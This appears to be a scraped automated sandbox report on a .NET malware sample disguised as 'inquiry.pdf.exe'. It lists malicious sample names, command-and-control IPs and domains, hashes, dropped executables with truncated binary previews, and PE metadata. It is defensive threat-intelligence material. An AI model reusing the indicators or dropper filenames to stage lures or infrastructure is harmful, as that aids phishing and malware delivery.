                                                          23.105.131.206Shiping Details PL BL Draft IVN-FDX54635537355.exeGet hashmaliciousBrowse
                                                            Invoice.jsGet hashmaliciousBrowse
                                                              DOC_BANK.EXEGet hashmaliciousBrowse
                                                                payment details.pdf.exeGet hashmaliciousBrowse
                                                                  C06689-L2C.pdf.exeGet hashmaliciousBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    hannoyputa.giize.comShiping Details PL BL Draft IVN-FDX54635537355.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.206
                                                                    SecuriteInfo.com.Variant.Barys.30112.3657.23804.exeGet hashmaliciousBrowse
                                                                    • 157.245.246.87
                                                                    NKDlmOiSbb.exeGet hashmaliciousBrowse
                                                                    • 157.245.246.87
                                                                    Shiping Details PL & BL Draft.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.228
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.1316.28686.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.228
                                                                    Shiping Details PL & BL Draft.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.228
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.29264.30682.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.228
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.10398.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.228
                                                                    SecuriteInfo.com.Variant.Lazy.234727.32325.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.228

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    LEASEWEB-USA-NYC-11USPO No.77466.pdf.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    Orden de Compra QUO19009451 FMC.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    New PO 2235788.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    New PO 2235788.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    est4iyo7ce.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.195
                                                                    ACHWIRE_REMITTANCE_STATEMENT.xlsxGet hashmaliciousBrowse
                                                                    • 23.81.68.41
                                                                    ACHWIRE_REMITTANCE_STATEMENT.xlsxGet hashmaliciousBrowse
                                                                    • 23.81.68.41
                                                                    UniCreditGP-1046.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.204
                                                                    Invoice No.000733487303.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    New P_O No.00355498.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    Shiping Details PL BL Draft IVN-FDX54635537355.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.206
                                                                    ARRIVAL NOTICE_New Order 2022804914.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.244
                                                                    Invoice.jsGet hashmaliciousBrowse
                                                                    • 23.105.131.206
                                                                    #75758.......pdf.exeGet hashmaliciousBrowse
                                                                    • 23.19.227.82
                                                                    UHBID 4532ED.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.186
                                                                    Serviced PO.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.186
                                                                    IMG_Bank swift message.pdf.exeGet hashmaliciousBrowse
                                                                    • 23.19.227.82
                                                                    New Order.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.238
                                                                    HDCOED 345.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.186
                                                                    Ordene.exeGet hashmaliciousBrowse
                                                                    • 23.105.131.186

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0eXezmjebyq.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    SecuriteInfo.com.Trojan.DownLoaderNET.476.27917.25504.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    cmGC87EqFi.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    URGENT REQUIREMENT.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    IMG-ZIRAATI03102022.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    PO-13466.vbsGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    Inquiry list.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    PO ZY-ZXM-2022092901.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100
                                                                    file.exeGet hashmaliciousBrowse
                                                                    • 142.250.203.100

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    C:\Users\user\AppData\Local\Temp\jhFFFffkl.exePO ZY-ZXM-2022092901.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.IL.Trojan.MSILZilla.23237.21800.16663.exeGet hashmaliciousBrowse
                                                                        Serviced PO.exeGet hashmaliciousBrowse
                                                                          SPK Contract - Pending Approval.exeGet hashmaliciousBrowse
                                                                            warbpoy.exeGet hashmaliciousBrowse
                                                                              sasbug.exeGet hashmaliciousBrowse
                                                                                Ordene.exeGet hashmaliciousBrowse
                                                                                  New Order.exeGet hashmaliciousBrowse
                                                                                    afriwar.exeGet hashmaliciousBrowse
                                                                                      LBT-50T-A-188 N -RO(PDF).exeGet hashmaliciousBrowse
                                                                                        edonbee.exeGet hashmaliciousBrowse
                                                                                          Purchase order NXLT02208211.exeGet hashmaliciousBrowse
                                                                                            apunawo.exeGet hashmaliciousBrowse
                                                                                              RFQ # 20002172 OQ & 20002179 OQ.exeGet hashmaliciousBrowse
                                                                                                putam.exeGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Trojan.Inject4.41134.3249.exeGet hashmaliciousBrowse
                                                                                                    seeam.exeGet hashmaliciousBrowse
                                                                                                      Confirmed PO_AYA547.exeGet hashmaliciousBrowse
                                                                                                        babalo.exeGet hashmaliciousBrowse
                                                                                                          PO 20008098.exeGet hashmaliciousBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inquiry.pdf.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\inquiry.pdf.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.355304211458859
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                                            MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                                            SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                                            SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                                            SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jhFFFffkl.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1362
                                                                                                            Entropy (8bit):5.343186145897752
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovj
                                                                                                            MD5:1249251E90A1C28AB8F7235F30056DEB
                                                                                                            SHA1:166BA6B64E9B0D9BA7B856334F7D7EC027030BA1
                                                                                                            SHA-256:B5D65BF3581136CD5368BC47FA3972E06F526EED407BC6571D11D9CD4B5C4D83
                                                                                                            SHA-512:FD880C5B12B22241F67139ABD09B99ACE7A4DD24635FC6B340A3E7C463E2AEF3FA68EF647352132934BC1F8CA134F46064049449ACB67954BEDDEA9AA9670885
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):78336
                                                                                                            Entropy (8bit):4.369296705546591
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                                                                                            MD5:0E362E7005823D0BEC3719B902ED6D62
                                                                                                            SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                                                                                            SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                                                                                                            SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                            • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: PO ZY-ZXM-2022092901.exe, Detection: malicious, Browse
                                                                                                            • Filename: SecuriteInfo.com.IL.Trojan.MSILZilla.23237.21800.16663.exe, Detection: malicious, Browse
                                                                                                            • Filename: Serviced PO.exe, Detection: malicious, Browse
                                                                                                            • Filename: SPK Contract - Pending Approval.exe, Detection: malicious, Browse
                                                                                                            • Filename: warbpoy.exe, Detection: malicious, Browse
                                                                                                            • Filename: sasbug.exe, Detection: malicious, Browse
                                                                                                            • Filename: Ordene.exe, Detection: malicious, Browse
                                                                                                            • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                            • Filename: afriwar.exe, Detection: malicious, Browse
                                                                                                            • Filename: LBT-50T-A-188 N -RO(PDF).exe, Detection: malicious, Browse
                                                                                                            • Filename: edonbee.exe, Detection: malicious, Browse
                                                                                                            • Filename: Purchase order NXLT02208211.exe, Detection: malicious, Browse
                                                                                                            • Filename: apunawo.exe, Detection: malicious, Browse
                                                                                                            • Filename: RFQ # 20002172 OQ & 20002179 OQ.exe, Detection: malicious, Browse
                                                                                                            • Filename: putam.exe, Detection: malicious, Browse
                                                                                                            • Filename: SecuriteInfo.com.Trojan.Inject4.41134.3249.exe, Detection: malicious, Browse
                                                                                                            • Filename: seeam.exe, Detection: malicious, Browse
                                                                                                            • Filename: Confirmed PO_AYA547.exe, Detection: malicious, Browse
                                                                                                            • Filename: babalo.exe, Detection: malicious, Browse
                                                                                                            • Filename: PO 20008098.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.

                                                                                                            C:\Users\user\AppData\Local\Temp\jhFFFffkl.txt

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):54
                                                                                                            Entropy (8bit):4.780272863587716
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:nvm1WXp5cViEaKC5R61C1:vIWXp+NaZ5R6I1
                                                                                                            MD5:84F251DCE20B2D2C9858E927B9D7CC07
                                                                                                            SHA1:C2D9CC168C194D3A9DB802D2AC3A601A271B1B8C
                                                                                                            SHA-256:177B391818C82E4ECBE90455E3B9A2971F15FAA67D0D2B98D93DDC6250139797
                                                                                                            SHA-512:1E1AC5A3B0064FB3A16580BC830DD8E1503DD3C3C08F77999E43D5B68299182FEE5ECF57A184E600109802FBD525917199C616B3C532EB6C96676192975DBC82
                                                                                                            Malicious:false
                                                                                                            Preview:4760..C:\Users\user\AppData\Roaming\glonkjhg.exe..0..

                                                                                                            C:\Users\user\AppData\Roaming\glonkjhg.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):686592
                                                                                                            Entropy (8bit):6.668579935043723
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:1DSdV3qBgQeAnkclIfVfhWQBIJ0bnaQZPyIlEnuHCW:sdV3HQeAnN+F3FbEu
                                                                                                            MD5:6236E43DA1B2C6279760E6B2B7E2D40F
                                                                                                            SHA1:A24221417FF9C0D169BF17B7F242824FE61D3B72
                                                                                                            SHA-256:B4056E17199EDD889D2B77C02865136C47AB29566717C2F86AE8911C02E2994A
                                                                                                            SHA-512:88C121E4BB4274C71E6B9989ED4729F6A970CD5FDD28E08CEC99D7B3FBDCDCF11884F1815A69FB91FFD425FF633AE731686BB6D2B1E715A7D3D575612EE679CD
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.9N..............P..n............... ........@.. ....................................`....................................W.................................................................................... ............... ..H............text...4l... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B........................H.......P....s......n....M................................................(....*&..(.....*.s.........s ........s!........s"........*&........*&..(-....*".......*Vs!...(2...t.........*..(3...*~.(4.....s-...('...}'....(+....*&.{....+.*6..('...}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{....+.*"..}....*&.{..

                                                                                                            C:\Users\user\AppData\Roaming\glonkjhg.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            \Device\Null

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):823
                                                                                                            Entropy (8bit):4.849820620027152
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeT0sQpAFSkIrxMVlmJHaVzvv:/JdAokItULVDv
                                                                                                            MD5:0E44BA60948680C2D34F551973EDCCBE
                                                                                                            SHA1:6C4D1FADDD2F3E06FD61FE16EC634FCD50A7CAA6
                                                                                                            SHA-256:F16318E0221AAAE070E68CD2D022600F5C2A1501B24375F422B16796F31EA63D
                                                                                                            SHA-512:9100F51E910AC6BC35AF242B63AD8472BFB190461F340C2CB33873D05462954716669932736C1594CF738F856D2F0717FFA7E0E5032F4308197E45E3535657AF
                                                                                                            Malicious:false
                                                                                                            Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 12, Received = 12, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):6.668579935043723
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:inquiry.pdf.exe
                                                                                                            File size:686592
                                                                                                            MD5:6236e43da1b2c6279760e6b2b7e2d40f
                                                                                                            SHA1:a24221417ff9c0d169bf17b7f242824fe61d3b72
                                                                                                            SHA256:b4056e17199edd889d2b77c02865136c47ab29566717c2f86ae8911c02e2994a
                                                                                                            SHA512:88c121e4bb4274c71e6b9989ed4729f6a970cd5fdd28e08cec99d7b3fbdcdcf11884f1815a69fb91ffd425ff633ae731686bb6d2b1e715a7d3d575612ee679cd
                                                                                                            SSDEEP:12288:1DSdV3qBgQeAnkclIfVfhWQBIJ0bnaQZPyIlEnuHCW:sdV3HQeAnN+F3FbEu
                                                                                                            TLSH:EBE48D6F23D5AF70C17DF3BA3394B91113A5E5CBA210C7DB0A4585E8B723BC56A8D242
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.9N..............P..n............... ........@.. ....................................`................................

                                                                                                            File Icon

                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4a8c2e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x4E398062 [Wed Aug 3 17:07:46 2011 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa8bd40x57.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x60a.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xa6c340xa6e00False0.6306896652621723data6.679772249142144IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xaa0000x60a0x800False0.34716796875data3.6238763425012226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xac0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                            RT_VERSION0xaa0a00x380data
                                                                                                            RT_MANIFEST0xaa4200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 3, 2022 17:28:40.584846020 CEST49699443192.168.2.3142.250.203.100
